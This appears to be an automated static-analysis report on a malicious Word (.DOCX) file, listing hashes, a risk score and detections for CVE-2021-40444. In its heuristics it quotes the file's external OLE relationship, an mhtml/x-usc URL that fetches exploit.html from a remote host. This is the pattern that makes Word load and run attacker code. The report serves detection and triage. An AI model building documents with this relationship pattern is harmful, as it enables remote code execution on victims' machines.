Malicious Office (OOXML) / .DOCX — malware analysis report

Static analysis result for SHA-256 f3d7afa6a2148b30…

MALICIOUS

Office (OOXML) / .DOCX

11.6 KB
Created: 2022-05-30 06:30:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2026-05-30
MD5: 6ad58b696f80d2751401fb019467065b
SHA-1: a4c96e7eb5ac5d4c953c6ef33d39438e4184433a
SHA-256: f3d7afa6a2148b308485b9001b0b651970038dd376846bb263712e7a5d9dd71c
Risk Score: 162

Heuristics (4)

  • External OLEObject gadget — CVE-2021-40444 [critical] [CVE exact] [CVE_2021_40444]
    External relationship to mhtml:http://172.16.100.31:8081/exploit.html!x-usc:http://172.16.100.31:8081/exp — exploitable external OLEObject gadget pattern for CVE-2021-40444
  • ClamAV: Doc.Exploit.CVE_2021_40444-9891528-0 [critical] [CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Exploit.CVE_2021_40444-9891528-0
  • External relationship [high] [OOXML_EXTERNAL_REL]
    External target in word/_rels/document.xml.rels: mhtml:http://172.16.100.31:8081/exploit.html!x-usc:http://172.16.100.31:8081/exploit.html
  • Embedded URL [info] [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://172.16.100.31:8081/exploit.html!x-usc:http://172.16.100.31:8081/exp (OOXML external relationship)
    • http://172.16.100.31:8081/exploit.html!x-usc:http://172.16.100.31:8081/exploit.html (OOXML external relationship)